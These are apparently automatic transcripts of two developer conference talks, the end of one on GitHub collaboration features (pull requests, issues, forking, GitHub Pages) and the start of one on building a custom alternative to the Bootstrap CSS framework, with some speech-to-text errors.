I don't know, can you see? It's very faint on the projector and on the confidence monitor here, but a really faint kind of lime green highlighting to that line. So if you compose text, non-code text, in markdown or ASCII doc or textile or a format that KITEP supports, the prose diffs will show red and green markers and strike through and everything of how the file is changed. Super helpful. Louder? David, does that apply to syntax highlighting code? I don't think it does. No. No, I had to ask a GitHubber, and he says no. Now there's another speaker at the conference here who was actually instrumental in this feature. There's a GitHubber here who helped build some of this. So it's cool stuff. I can't tell you how many times when I'm working on text, and it's not in a GitHub repo, where I want this. You want to know what's changed. I have a 17-year-old daughter, and I was collaborating on her with an email she was going to write to a bunch of people. It was a couple paragraphs. It was no big deal. I made some changes, and I just sent them back to her in an email. I felt like a total jerk. Like, how's she supposed to know what changed? If it's not inside a repo, how do you know what's going on? But it's a good idea to try to get this stuff in a repo to try to get text like this here, and you get some nice stuff. So I'm going to go with David's squirrels. Looks good to me. Going to ship it. And David says, metal. Good. All right. One more pull request. I want to see some more trouble that you guys have made. Somebody has complained about cats. Yeah, OK, fine. That's enough of that. All right. So when I go back to math, I want to see what I can do. So I'm going to go back to master. Now I see in my readme, we have squirrels and cats, and American Slang is still there. We'll come back to that pull request later. I'll ask you towards the end if I got away with no slang. Now let me go back to my command line and see what's happened. Now I just merged things into master. I'm still on my strange aesthetic branch. I don't know if I really need that right now. So I'm just going to go check out master. And I'm going to do a pull. That's going to update master. So now I'm all up to date with the stuff that's gone on up there. Thanks for your help. And we can see in the log, some neat things have gone on. That's the evidence of merged pull requests that have happened in the repository. So we'll let that play out. We'll take a look at that as work proceeds. And a little bit of cleanup here. You know what, folks? My branch, my strange aesthetic branch, I don't really need that anymore, do I? So let's go ahead and delete that. And we will push that delete up to GitHub. We don't need that branch to exist up on GitHub anymore either. That looks pretty clean. I like the look of that. So I'll go back up here. Just give us a refresh. There's still some pull requests lurking around there. But I've got some more. Request lurking around there. But I want to go remember what it is we're supposed to be doing. I need to keep my eye on that agenda because we only have an hour together, about another half hour together. So what we've done is we've looked at Webflow. We've looked at pull requests. I want to tweak this a little bit. Instead of those, I'm going to put a dash and square brackets instead of just a regular bulleted list. This is another thing you can do with issues. Let me update that. Now it becomes a checklist. And I can check those things off. That actually modifies the state of the issue. If I go back and edit that again, you can see there are X's there. So issues are a super handy way to keep track of. And this is not unusual for code you're going to write. There might be, here's six things we need to make sure they happen. You can make it a checklist like that. So our agenda is now a checklist. We're skipping ahead and we're focusing on issues right now. So some things we can do. Ah, Fred. Good point. We'll get there. That's one of the places I want to go. An undocumented URL hack. Issues. Now let's go back and look at our list of issues. The first thing I notice is that three issues showed up that I didn't create. That's because those are the issues that correspond to pull requests. Every pull request has a corresponding issue. In fact, you can think of a pull request as an issue with code attached to it. But that's not all we have. And we happen to have those. But I want to create another one because there is a bug in the strange ascetic. It was pointed out in the PR, but TLBerglund merged it anyway. We don't have a URL emoji for Cowboy. Now I just did another thing. I mentioned somebody. I mentioned myself, of course, but at and then the GitHub username, like I could say, hey, dgram, could you weigh in on this too? So I just mentioned David Graham. David Graham is going to get either an email or a web notification or both, depending upon how he has his notifications set up. But I have pulled that guy in. He's subscribed to this thread now. He's going to get notified of everything that happens in it, probably, depending upon how his settings are configured. But he certainly got an email when I mentioned him, or a notification of some kind. So I got his attention, brought him into the discussion. He doesn't have anything to say right now. He's usually a man of few words. That'll probably happen later. But here we go. This is a second issue. Now, I wonder, ah, there you go. David, just weigh it in. He said, sounds good. Thanks, David. I can't recall the issue number, the first pull request I created. I don't, was that one or two? I can't remember. I want to reference it here. I want this issue to be linked back to that other work I was doing. So I want to say, for reference, you should see. And if I knew the number, I could just type the number right now. Like if it was issue 645, that would just work. I don't know the number. But I think it said something about poem in it. There it is. OK, that's right. So I want to link to an issue. A link to an issue is a pound sign and the issue number. And then those two issues are connected. I'll get a hyperlink in the history. A lot of people don't know that that works at all. And it's super cool for kind of keeping track of the relationships between things. If you want to say that one issue depends on another, you could indicate that with a link. If you don't remember the number of the issue, you can just start typing some words from the title, which I did there, kicking off a new poem. Oh yeah, that's right. It's number 6. I'll hit Enter. And I get that. So now this issue, number 8, is linked to issue number 6. I could follow that link. And issue number 6 is linked back to 8. So when I link to an issue or a pull request, that issue or pull request automatically gets a link back to me. So we can connect things in that way. And I'll point out again, this comment box, all the same stuff we've had all along. I can drag and drop. I have GitHub, Flavored, Markdown. I even have the so-called Zen mode where I can edit full screen. This, in my opinion, is a temptation to create very long posts and issues. And there are at least two problems with that. So be careful. If you're going to use Zen mode, don't yield to that temptation. Or just don't use Zen mode. That's also pretty safe. But it's there if you want it. All right, so what do we got? We've got mentions. We've got links. We have tags. Now, I haven't done anything really useful with tags yet. But for example, this guy, I might label this as a bug because it is a bug. Needs more squirrel. That sounds like that is an enhancement. And those exist already. If there are other labels that don't exist, well, I'm free to create those the way I want. Like I would create a label called Poem. And Programmer Poem and Bug in the Strange Ascetic, those are both associated with Poems. So I'll apply those labels. And now, obviously, I'm able to filter issues by labels. So labels are meant to be the emergent metadata system in GitHub issues. You can't go into an issue and say, hey, I want every issue to have these six other fields to it. There's no custom metadata. There's just the discussion thread plus the tags. But you can use tags for pretty flexible things. That works out fairly well. All right. I want to do one more thing with issues. I want to do one more thing with pros edits. So how's this going to work? Now, I'm going to go down to the command line again. Make sure we're up to date here. Cool. We're up to date. I'm going to go make a new branch. Now, I created a branch and switched to a new branch. And I'm going to go back to the command line. And I'm going to go back to the command line. Now, I created a branch and switched to it in one command. That's that checkout-b bugfix. And now I'm going to edit ascetic.text if I had been a heathen. I'll add that. And I'm going to commit it as well. Well, no. There we are. I have Git configured on my system to use TextMate as my default commit editor. Right out of the box, Git uses VI as a default commit editor. I love VI for editing small amounts of text. I don't have a problem with it at all. But TextMate is a little more fun. So I've configured Git to use TextMate. That's why that popped up like that. Now, what I want to say here is I want to say, you know, fixed verb form in first line. Or so that's a pretty bad message. I'm not a really big fan of that. What I really want is to indicate that it fixes an issue. I don't remember off the top of my head what issue that was. So we'll just go back. And that's bug in the strange ascetic. That's issue number eight. We see that eight right there. All right. So I'm going to go here. And I'm going to say this fixes number eight. Or I could say closes number eight. I'll save. I'll push. There, let's do this right. I'll go into the strange ascetic issue. I'll do the push. No, I won't do the push. Good deal. OK. So I just pushed that bug fix into a branch. This issue number eight, and I put that magic text, fixes number eight, this issue is still open because I pushed the fix to something that wasn't master. All right. Now, that fixes message is magical. And GitHub will find that. But it'll only find it when it's committed to the default branch. And the default branch, by default, is master. And that's what it is right now. So let me fix that. What would you say I should do? I think maybe I should make a pull request. That seems responsible to me. So let me create a new pull request where I'm going to compare bug fix into master. All right. And you may notice it's a little smarter about what's going on here. It says, well, you took one line away and you added one line. Really what you did is you added the word had. So that's good. Let me create that pull request. I'm going to leave all that as the defaults. We're back in the pull request view. And that's kind of funny. I was just looking right now for the source and rendered buttons that we saw before. Is anybody willing to guess why there is no source and rendered button on the screen right now? Because it's a text file, nothing to render. Well, sure there's something to render. It's rendered. You can see it right here. This is just what it looks like. So maybe if we have time, I'll play with a markdown file a little bit and we can see that prosdiffing take place. And we all automatically have word diffing showing up in this text file for us. So that's a nice hint there. I'm going to go ahead and merge. David really wants me to move ahead with this thing. We have another squirrel. And for that, I'm going to find an appropriate animated GIF for David. Upload an ominously named GIF. Wait for it. Don't pause there. So cruel it's pausing. It's even worse. I might not be able to make you wait for it. All right, now we can watch it all the way through. Touch the spider. I believe this is a spider from Australia. If you talk to an Australian about these, everybody's got a story. And finally. Oh, it's so horrible. OK, merge it. That's what I say to squirrels. And now, and also by the way, this happened, this popped up before and I didn't highlight it. GitHub has said, well, you've merged the branch. You probably don't need it anymore. Let's keep things clean and delete that branch. And now when I go back to look at issues, what is missing? There's a bug in the song of the strange aesthetic. Issue number eight is no longer shown here because it's a closed issue. I click on closed and there we go. It's closed because I wrote that text in the commit message and then later committed that, merged that into master. That shows up as closed there. All right, that's probably here. Let's go into the agenda. That is probably all the fun we have to have with issues. And I think that's one of the things that I'm going to use for right now. The other best thing to do with an issue is simply to close one and then get that work done. But these, again, you can use these not just for bugs and features, but really for organizing work. I have worked in capacities in the past where a lot of my activity from day to day was coordinated and I collaborated with other people through comments on issues. And I think that's one of the best things about this work. That's one of the best things about this work. I think that's one of the best things about this work. I think we have adequately covered animated gifts. I hope so. I would like to cover forking briefly just so everybody has a clear idea what that means. And then we'll look at GitHub Pages and probably have a couple minutes for rebasing. So forking. Here we are in the view of my repository. And there are seven of these. So seven intrepid, six intrepid audience members have clicked that button. And these are those people. Teal Berglund, he doesn't count. You always count as a fork of your own repo. But those people, Dgram, Jep13, Glenn Beck, not to be confused with the American television personality of the same name. All of those people have forked and they have done work. Some of them have even submitted pull requests. But I'm able to see who's done this. What it means to fork is simply to have your own copy of the repository. So this is, and I may be mispronouncing the way you like that to be read, but Glenn Beck, instead of Teal Berglund, NDC Oslo 14, this is Glenn Beck, NDC Oslo 14. And I can't edit this. It's not my repository. It's public, but only Glenn is able to edit this unless he adds collaborators. So that's, there's a lot to this. This is how GitHub enabled open source development in the way that it did. I can have a repository. And let's say there are three people that I trust to work on that code with me. Now that's human trust. That's expensive to create. You actually have to know human beings. Someone you don't know to become trusted to that person, you have to develop a relationship. That's an expensive, non-scalable thing. It involves talking, maybe having drinks together, you know, whatever it is that you do to make friends with people. That's what you do. And that trusted group of collaborators is a small group. I'd like a nice small group of people who own the repo that I trust. But I want anybody to be able to make changes to it. And send me those changes. That's what forking is, accomplishes. And Glenn here had clicked on my fork button and created this copy. Now this is his. I can't go in and add this. Only he can. When he's done, he can send me a pull request. I showed you a pull request inside a repo. They kind of started as a way to work across forks. And let me, it's pointing back to me here. It says, oh, this is a fork of TL Bergland. I can still fork, believe it or not, because I'm a member of a few different organizations on GitHub. So I can create a fork of this that doesn't belong to TL Bergland. I can't fork to TL Bergland because that's where I am. But I could go fork to, here are some work repositories. Here are some other open source things. DOSug, that's the Denver open source user group. You know, I could go into the Denver open source user group. That's a user group I run back where I live in Denver. And actually create a fork. I just did that. Now DOSug has NDC Oslo 2014. And DOSug, people who are collaborators in the DOSug organization can now edit that thing. There you have it. So that's forking. Now, if you think about it, forking is conceptually similar to branching. Branching is a way to split work off and have a conversation about it. And have that work be tentative and then make a decision whether to merge the pull request. Forking is a way to split work off and have a conversation about it. And have that work be tentative with respect to whether you're going to merge the pull request. They're both the same when you look at them that way. What is different? Branching is a thing that you do inside a repository when everybody is a collaborator on that repo. Everybody has rights to push to that repo. Forking is a thing you do to manage permissions and manage the asymmetry of trust. I, as a user of an open source project, trust that project. Those collaborators don't know me from Adam. They don't trust me. To manage that, we have forking. It's a great system. So it's conceptually similar to branching, but fundamentally it manages permissions, which branching does not. Branching does not ever manage permissions. Okay. Last feature on our agenda. Let's keep things checked off. That was forking. Last thing I know I want to get to is GitHub Pages. This is cool stuff. So let's do it. Now, this read me. What do you think? That's awkward. I think I'd get some red cards if I was being rated on the read me alone. I think I would get a lot of red cards. There's not much to it. Now, I can go into that read me and I can put pictures in there. Let me show you. Just as a hack. This isn't a side, but it's a good aside. I want to show you how I do this. I would like this read me to have an image. Just a little more spice for the repository. Okay. Now, markdown gives me a syntax. That's an image, but I need the image hosted somewhere. Okay. How do I do that? Well, here's how. I'm going to blow that away. I'm going to go over here. Here's an open issue. This will work. Oh, milestones. Yeah, thanks. Maybe. Here I am. I have an open issue. I'm going to go to my awesome library of animated gifts. We're going to go with the tank crushing the cars. It seems like an American kind of thing. I don't want to post that to this issue. This is my agenda issue. A tank crushing cars has nothing to do with my agenda. That's weird, but I just needed that markdown. I'm going to copy that. That's amazingly cute, David. No, I tell you what. I'm not going to settle for that. If it's cute you want, instead of the violent and militaristic tank crushing the cars, I'm going to give you a cute dog. All I did was I dragged the picture into an image, cut it, and it's gone. It's away from the image. I was cheating. I was using it as a hack to borrow free web hosting from github.com. Now I've done that. That image has been uploaded to their cloud hosting thing, and now that markdown is in my readme. I will commit that. What's that? Is there any sort of quota? I think there's per upload quota of five megs. I don't think they really notice if you upload a lot of things. Maybe somebody's watching something and you'll get an email. Typically the way they deal with that kind of thing, if you're getting a little crazy, they'll email you and they'll say, hey, bro, what's going on? They don't shut it down. They're more like, did you mean to do that, or could you stop? There have been sort of implicit denial of service attacks by image files getting deep linked and sort of going viral, and that's happened. It'd be nice, but anyway, the point is, here we are. The point is that's cute, and that is now on my project page. And it doesn't get any cuter than that. But still kind of lame as a website. And readme's can get quite elaborate. You can do a lot of good things. Gentlemen, are we good? Okay, just to make it sure. I thought I had somebody calling time down there. By my clock I have nine minutes. Do we have nine minutes? Do I have agreement on that? Outstanding, okay. I would like a web page instead of just a readme. So I'm going to go to Settings here, down at the bottom. Haven't visited Settings yet. That dog is so cute. And in the middle is this block called GitHub Pages. This is the free web hosting built into every GitHub repository. I'm going to use the automatic page generator. Now, if you already have a website, you're a designer, you have a designer, you play a designer on the Internet, whatever it is, you've already got web content. You don't have to go through this. I don't have any, and I'm not going to make you watch me live code HTML. So I'm just going to click on Automatic Page Generator right there. And this gives us GitHub Power Tools from NDC, Oslo 2014. That's my project name. Now, let me make that the tagline. And I can just click on that button, and my readme just got sucked in to be my front page web content. All right, good, because I still want that cute dog in there. Let's continue to Layouts. And now I get these nice professionally designed templates that are way prettier than what I'd come up with. I like Midnight, but it doesn't fit the dog. Tactile. No, guys, you know, I hate to say this. I'm going to have to go with Merlot today. That works for me. Okay, so I'm going to publish that. And it says it may take up to 10 minutes to activate. It gives me this URL here. Now, let's just take a look at that URL. Okay, it says timberglenn.com slash NDC Oslo 2014. It says timberglenn.com, because I've got some other config in my account that maps things to that custom domain. By default, what's going to happen is it's going to go to, so this is github.com slash TLbergland slash NDC Oslo 2014, right? That's the name of the repository. By default, that is going to go to a site called, and I will just open a tab and say it's going to go to a site called TLbergland.github.io slash NDC Oslo 2014. You could see the formula. If you don't have a custom domain mapping, that is where your site is going to go. And I should be able to navigate there, and it just redirects to timberglenn.com. But here you go. Here's my website. Built into my repository. Now, one last trick. Where is that thing? And it's a website. Do I have to edit it in the browser and edit HTML in the browser? I mean, that's a terrible way to live. So let me just do a fetch and see what I get. Okay, it's pulling some stuff down. I have a new branch called github pages. Let me check that out. Let me do a directory listing. Now, usually when you look at a branch, it looks kind of like your project, just with some different files. Before I had readme.markdown and poems. Now I have a website. So github pages is just that. github pages is a website built into your repository on this separate branch that's completely disconnected from the rest of your history. So github history is a graph, right? And if you never do github pages, it's a connected graph. Every commit, or you can, from any commit, you can at least navigate down to the root commit. Once you get the ghpages branch in there, it's now a disconnected graph or a multigraph, and you've got this other history, which I can go in there and edit. See, where's my list of things to do? Yeah, li. There we are. Let's just say, oops. Add a little bit of markup there. Oops, I used some slang. I'll push back to my github pages branch, and it doesn't always refresh instantly. Sometimes there's some stuff that has to happen on the back end. But there you go. You notice that change I made to the markup locally is now reflected on the web. So if you want a nice project page that's an actual web page and not just a stylish readme with pictures in it, you can do that. It's built in, it's for free, to an actual front end professional, unlike the guy who's standing on the platform right now who is not a front end professional. You can give this to a web person, and they can actually just work on it like a regular site. And even within ghpages branch and merge and use git to control this content. It works perfectly naturally. And then when you push work back to ghpages, the site is updated. It isn't just HTML, markdown. You can put all of your web content in markdown, and that works. And there is a framework on top of markdown. I'm not going to show it to you, but I want you to remember this. A framework called Jekyll. Now there is a Jekyll renderer built in to github pages. And this is, it was kind of built as a static blogging framework. And it's possible to have, to manage some moderately sophisticated content using Jekyll and github pages. And have fragments and containers of things and things like blog posts or comments or blog posts and speaking events or whatever you might want on a personal website like that. It's all right there. You can use Jekyll to do that. There are some great examples of Jekyll sites out in the wild. Jekyll is fairly well documented by itself. And a nice thing to use inside pages. So that pretty much brings us to time. Let me go back to my agenda. We'll click off that. We didn't get to rebasing. Didn't think we would. And I'm going to say we did look at pros dipping a little, but not much. I'm going to leave that as unchecked and just strike through rebasing and say, this session has been shipped. Ah, a cute raccoon. And when I close this issue, I say thank you very much. Have a great day. Remember to vote on your way out. There's the cards, throw a card in the box. Have a good one.
Most developers think of Git and GitHub as two sides of the same coin, but all too often our attention is focused on the Git side alone, and not on the capabilities of GitHub as a collaboration platform. Millions of people have already joined the site that offers amazing features like pull requests, project pages, integrated web site hosting, issue tracking, prose collaboration tools, permission controls, and easy integration with third-party services. Come to this talk to learn how to make better use of GitHub through the site's commonplace and advanced features alike.
10.5446/50644 (DOI)
All right. Good morning. Can everyone hear me okay? Great. Excellent. We might have a couple of people still trickling in, but I'll go ahead and get started. This is Build a Better Bootstrap. If this is not where you were intending to be, it's okay. You can leave now and I won't judge. My name is Tim G. Thomas. I have, and this is my second year to be very honored to have been chosen to speak here. It's a great conference with amazing attendees. I love the city. It's a great place to be. So I'm very, very happy to be here. I work for Frog Design in Austin, Texas. We're a digital innovation agency with offices all over the world. We sadly do not have one in Oslo yet, but rest assured that when I get back, I'll try to see if I can finagle an office to be opened up here. If you'd like to hear more of what I have to say, I rant a lot on Twitter at Tim G. Thomas, and I'm also on, I also blog at TimGThomas.com. A couple of the topics that I'll be speaking on today I've blogged about in the past and will likely be blogging on in the future as well. So if you decide to follow me, I'd appreciate it. And then one other thing, a former co-worker of mine suggested that I create little hashtags for each of my talks to keep the conversation going, both during the talk. You can speak to yourselves over Twitter and afterward. I've got a column set up in my tweet deck for the hashtag Better Boots Trap. So if you have any questions that I didn't get to cover during the talk, or maybe there wasn't enough time at the end, or you're just feeling anti-social, you're welcome to tweet anything at this. You don't have to tweet at me, and then I'll be watching that sort of throughout the day and for the conference if you'd like to, I like to communicate that way. So with that any further ado, I'd like to get started by talking about what's wrong with Bootstrap. Okay, maybe that's a little bit of a troll and maybe the title of the talk was a little bit of link bait because I don't necessarily want to spend an entire hour bashing Bootstrap. I know a lot of developers who like Bootstrap and who use it on a great number of projects. I've used it on a number of projects myself. And it certainly has its place. I don't want to give you the impression that I feel that we should do away with Bootstrap and all of its competitors. But I feel that the number of times that it's typically brought out when we're using it to build applications may be a little more than we necessarily need to. And I'll talk about why that is shortly. But I want to make this a little more generic by saying what's wrong with CSS frameworks in general. And the first thing that I'll say is that they're relatively large. And I don't mean that in the sort of generic, oh, they're big sort of way. I literally mean relatively large. They're large in relation to what you might be able to write for your own projects. Take Bootstrap, for example. Okay, I said I wasn't going to bash on Bootstrap, but it is a well-known example. The code, I pulled this down off the latest version of Bootstrap. It's 113 kilobytes if you include the sort of default theme that they provide that's minified. The larger, the unminified version is a little larger still. This isn't horrible, but especially in the days of like including Angular or Ember in your application, which I think Ember last time I checked was like 600 kilobytes even minified or something along those lines. So it's not a horrible amount of space. But it is space, and it is space that you may not necessarily need all of. I was talking with another speaker this morning, and we were mentioning that even still there are ways that you can get this file size down, but still it's larger than maybe if you wrote stuff just specifically for your types of applications. Many of these CSS frameworks feature similar appearances across the instances where you use them. The best example is this button that I can instantly recognize on many, many sites. It's becoming a little more difficult to recognize if this is Bootstrap because I feel a lot of other CSS frameworks have actually taken the same visual style and applied it to their buttons too. But normally this or maybe the little light blue glow that you see over input boxes, dead giveaway that the site you're using typically has Bootstrap on it. And this reminds me of another type of visual treatment that we sometimes used to see on buttons. Our good friend, the Aqua button, back from the early OS X days. And I remember not very fondly the days of web design where every button had to look exactly like this because that was the thing. I don't necessarily think that the Bootstrap style is a fad in the same way that this was. And fortunately this is no longer a fad, at least not in the same way. But it is sort of the default. And so if you just drop Bootstrap in or any of the other frameworks, your sites and apps are going to look about the same. Now you can extend this, right? I mean that's the whole point. There are many developers and designers that have spent a lot of time and energy learning Bootstrap and extending it with custom themes. But unfortunately, this brings me to my next point, some of these frameworks are a little difficult to extend. Now this is admittedly a very opinionated type of comparison, but I personally have worked with Bootstrap on this kind of extension for a long time and I have found it very, very difficult to extend. One of the reasons why, or some of it's CSS selectors. This is an example pulled from the Bootstrap code. I actually ran it through the site, CSSStats.com, which I recommend everybody run all of your CSS through. It doesn't necessarily give you any hard recommendations on what to fix, but you become more aware of potential shortcomings in some of your CSS if you run it through CSSStats. So this particular CSS selector has four components to it. We have a direct child selector, the little carrot or the greater than sign. We have a plus for direct sibling. And so if you wanted, if you're using Bootstrap and use this particular element combination, panel default with the heading, the collapse, with the sibling of collapse that has a child of panel dash body, and you wanted to do something different with it. This was sort of the whole reason for cascading style sheets. So you could allow it to write your own styles and cascade back when you didn't need them. If you wanted to use one of the styles that was defined in here, you'd have to have the exact same selector at least so that the specificity would be such that your rules would override Bootstrap's rules. Now, if you wanted to know a little bit more about specificity, Estelle Weil has a great illustration about it. I don't want to talk too much about CSS specificity in this talk, but it is an important concept and something that is most of the source of many of my pain points working with Bootstrap. Turns out that there's actually something like 1,800 selectors in Bootstrap. Not all of them are as specific as the one that we just saw, but there are a number of them there. The other thing that there's a number of are important directives. If anyone was at Anthony's talk previous to this, amazing talk, by the way, and if you didn't get a chance to see it, definitely check out the video when it comes out. He also mentions that bang important is not necessarily something you really want in your CSS all that often, but there's 43 of them in Bootstrap's main code. I didn't look in the theme file. This is just in the main Bootstrap. Also, if you're unfamiliar with this little code snippet, I forget where I got it, but you can replace the bang important with anything and then give it a file name or even a directory and pipe that into the WC command and it'll tell you how many instances there are. So I normally will run this as part of my build process and fail it if there are any bang important directives. So if you're ever on my team, don't use bang important, I promise you'll regret it. Now, all of these things about these frameworks are improving, right? We're getting smaller file sizes for Bootstrap and all of the others out there. I mentioned before there's the customizer tool that you can pick and choose certain things from the framework. There's a lot of themes that are coming out. There's incalculable amounts of themes for Bootstrap and many of its competitors as well. So similar appearance isn't quite as big of an issue as it was. The extension points are also getting better if memory serves the number of bang important directives in Bootstrap used to be much, much higher than 43. So it's much, much better now. They also seem to have done away with a lot of the ID selectors that I remember from the earlier days. So everything is doing fairly well in that regard. So all these things are getting better. Do you still need to not use it? Well, if there's one thing that I can say negatively about all CSS frameworks, it's that none of these are actually targeted for just your needs. Now, I've personally found Bootstrap works very well for static content sites if I'm making some sort of marketing site or something. The types of UI paradigms and design patterns that the Bootstrap team uses work very well for that. But many of the times that I'm working on apps and your mileage may vary, but I imagine many of you may have similar experiences, are on business apps. So it doesn't necessarily mean that I want some sort of like hero image layout with three columns for the different pricing models or something for my application. Maybe an internal item of business system or something like that. It just doesn't quite need all of the stuff that Bootstrap gives you. And I'd almost argue that there are very few apps that actually would take advantage of everything that Bootstrap or any other CSS framework provides. And admittedly, that's probably not their goal. They're probably not trying to match it to your specific examples exactly. They are trying to get you most of the way there. But building your own CSS framework is a way to get you guys exactly to where you need to be. And that's not to say that we can't take some great lessons from Bootstrap, and we'll see some of the examples of that. But the goal is today, hopefully, that you'll learn that you don't necessarily have to go out and download these potentially monolithic, though they are getting smaller, slightly difficult to extend, though that's getting better as well, CSS frameworks to use in your own products. Now, if you'd like to know a little bit more about CSS frameworks in general, I gave a talk here last year on design frameworks for developers. You can watch the video up on Vimeo at this URL. And I'd love to hear your feedback on that one as well, but that's a way to kind of get a little more familiar with the landscape of design frameworks as they stood at least a year ago and which ones might be better or worse for you. So, to get started, I want to look at, in case you missed the URL, these slides are up online. There's a link at the end of the talk, so don't worry about missing some of these. But I have tried to keep the bit.ly links at least sort of consistent. So, if you do ndc-bb slash something, there's a decent chance it'll be one of the links in my talk. But you'll be able to see all of them after I put up the link to the slides later. So, one of the things that I noticed about Boot Shap, though, and one of the reasons why I credit it with being so widely adopted, is it directly attacks some of the challenges that developers and designers as well face when working with CSS. CSS is not the most friendly language to a lot of developers. I personally consider myself fairly good with working with CSS, and even I have days where I just want to bang my head against a wall. It's not the most obvious. It has a lot of very difficult components to it. But Boot Shap sort of fixes a lot of these, or at least abstracts them so you don't have to worry about it as much. So, Boot Shap addresses each of these challenges, and we're going to try to look at some of those today and see if we can't find some solutions that might be a little bit easier to grok than they used to be, and maybe allow you to use some of those solutions in your own CSS frameworks. So, before I get started, I wanted to take a couple of minutes and discuss some tools that we might use to help us along the way. One of the things that has definitely changed since I think Boot Shap became very prevalent early on is we have a lot more tools for dealing with CSS, stuff like CSS stats that helps you notice how many different sizes of fonts you have in your application, for example. It didn't necessarily exist back when we first started working with some of these design frameworks, and we have some of these now, so why not use them? Now, the first one actually has nothing to do with CSS at all, but is a general design tool that I highly recommend, and it's called Style Tiles. It's been around for a couple of years now, I think. You can see more information at styletile.es. The idea behind these is to provide kind of an abstraction of the way your application looks visually. So, think of it like a wireframe for your site's visual appearance, and what I mean by that is this is an example taken from the Style Tile site. You may notice that there's things like main headings and banners, there's colors, there's typography, there's textures, though those might be a little difficult to see on the projector, and there's also some adjectives that the author uses down here in the bottom right to describe the personality of the site. And we'll revisit these a little bit later in the talk, but I wanted to point them out to begin with, because having an understanding of the visual style in your application and how the individual components of that visual style fit together is essential before working on any kind of CSS that actually deals with style. There are some things that you can do with CSS that are a little more low-level, a little more to do with laying things out on the page, but very quickly I've found you end up dipping your toes into actually doing some things with colors and typography and so forth, and having one of these is kind of a reference really, really works well to keep some of the complexity down in your CSS. You don't even necessarily need to refer to it that often, just having it available while you're doing your CSS work, I personally found is very, very helpful. The next tool that I'd like to recommend is SAS, though you can use any CSS preprocessor. Bootstrap now uses this, in fact they may have always, they use less as their preprocessor, though they have a parallel line of work that's also using SAS that I believe they have some automated system that converts from one to the other. SAS happens to be my favorite. I've personally found that it's a little bit more of a programming language than less is. Less is a great way to add some syntactic sugar on top of CSS, but SAS gives you a lot of additional functionality on top of that still, and we'll see some of this a little bit later today. Anthony earlier today in his talk mentioned a couple of different ways to lay out some, split some of your CSS up. That reminded me very much of Jonathan Snook's sort of work on the scalable and modular architecture for CSS, also called SMACS. This is an online book and it's an e-book as well. It's relatively affordable and worth absolutely every penny, I refer to this very, very frequently. It's kind of his manifesto on designing good CSS and how to make it work within more complex layouts and how to sort of cut down on some of the maintenance problems that you might end up with later on when you're working on your projects. I don't specifically go into this today, but if you have a chance, definitely check it out. Much of the content is available on the site that you can just sort of read and not have to pay for the book, but the book goes into a lot more detail and I think you get some screencasts as well on implementing it. So it's a couple of years old, I believe, but absolutely worth checking out. So the next tool that I wanted to talk about is Harp.js. Who's heard of Harp or maybe one of its competitors? Not a lot. Wow, okay. So I was contemplating doing a demo. I might actually do that. Harp is a static web server that runs from a command line, very, very easy to get started with and simply serves up assets, but it doesn't just serve up static assets like HTML or CSS. It can serve up SAS, for example, and it will convert that to CSS before it actually gets served up. So let me do a real, real quick demo of SAS since not a lot of people have heard of it and it's pretty awesome. I am a pretty big fan. And I'll be using it for my slides or for the code for this talk as well. Okay. So let's see. Everybody see that? I can make it bigger. How's that? Everybody see that okay? I've seen some nods. Great. So Harp, as I mentioned, is a command line tool. So I can get started by just saying Harp init and then I'll just give it a name. Let's just say 2014. And it's going to download a little bit of default templating from the Harp site and then create a folder for us. So we just have a layout. So if you're familiar with any kind of master page scenarios, Harp uses something very similar. By default, they're all in Jade and less, but it will work with SAS. I think it might even work with CoffeeScript too. But this is all we have. Now all I need to do is say harpserver and shut down my other server so I don't get an error. And we now have a local server running on port 9000. And if I bring up a web browser, we now have a harpserver running. So this is a really great way to test out some of your own code. If we wanted to look at what this creates for us. I should have picked another folder. So here's our layout, Jade. Not much to it. There's some of the less files in here. Now they're not using less for any of their default styling, but you can just start typing in less or SAS or anything here as long as you use the right file extensions. And if you change any of the values, you can just go back to your web browser and refresh and everything's instantly there for you. So really, really easy way to have a very, very quick feedback loop when you're testing out some of your CSS. However, Harp doesn't necessarily do a great job longer term. It is a static web server after all. So there may be cases where you want to use something a little bit more robust. Broccoli is a great tool by Joe List that does just that. It's similar in functionality to Harp. It'll compile your SAS and some of your other templates and stuff like that. But it does it sort of inline. I don't know. There's some magic that's involved there. I don't pretend to know exactly what's going on. Really, really quick way of compiling SAS and some of your other templates and stuff. So if you're using any build tools like Grunge or anything, definitely check out Broccoli. So with the tools out of the way, I want to get directly into the challenges. And there's a bit to cover today. We may not get to everything, but we'll get to as much as we can. And the first challenge that I typically see people trying to tackle with Bootstrap is that of a general page layout. Thanks for letting me. I just realized I don't have my presenter notes anymore. Apologies. There we go. Okay. So what I normally recommend people use for that is simple CSS floats. Nobody's heard of Harp. How many people have heard of CSS floats? Decent number, hopefully. Okay, good. Do you all understand them fairly well? Maybe, okay. So to give you a brief overview, we've got a couple of divs here. They could be any other elements. And we want to put them side by side. Great. We can just add a float left to them and now their position side by side. Great. We now have a multiple column layout. And that easy. The problem is rarely do sites only have two columns and nothing else. Normally, we have something like this where we have maybe a container. We've got some other elements above and below that we also want sort of laid out in the right way. Unfortunately, when we float these, this happens. Not exactly what we're looking for. So there are a couple of solutions to this. Most of them are called clear fixes. The one that I happen to like best is just adding a CSS property of overflow hidden to the, in this case, the green container that you see here. And that will make sure that those floated elements now are used in the calculations for the height of that outer container. So you can see the blue box now appears where it's supposed to instead of being sort of pushed up to the top. And we also don't have to worry about the little green box collapsing in on itself. So if you have something like a background image, this will definitely, definitely help with that. So if we wanted to extend this out beyond just this very simple example, let me bring up one of the other demos. There we go. There's always that brief moment where everything is black and you're like, oh, please don't, don't crash on me. All right. Here's a slightly more complex and arguably more realistic page layout. But it's actually using exactly the same techniques that we just discussed. So we have a header at the top, a navigation bar, two columns in the middle, and then a footer. So if we were to look at this, the header and navigation, all of that stuff is probably what you might expect. We're not doing anything really crazy with it. We do, however, have this class of constrained. And all that does is provide us with a fixed width. If we didn't have that fixed width and everything would sort of, well, I have some CSS transforms, which is why it's centered and that's why it collapsed. But normally it would take the full width of the page. But the same approach actually applies. If you don't specify a fixed width in some of these things, then they'll, they'll either collapse or expand, do some things you may not want. So I have this constrained class that just makes sure that everything, each one of these rows is exactly 640 pixels. But each of these items in here, we have a main section where we're fully HTML5, we're using all the new semantic elements, no divs here for the moment. And we have an article that sits to the left and then a side bar that sits to the right. Each of these is simply floated and then I have some explicit widths. If I didn't do the explicit widths, they would collapse in on themselves much like we saw the rest of the site do just moments ago. So putting these explicit widths means I now can say this side has 70% width, this side has 30% width. And then 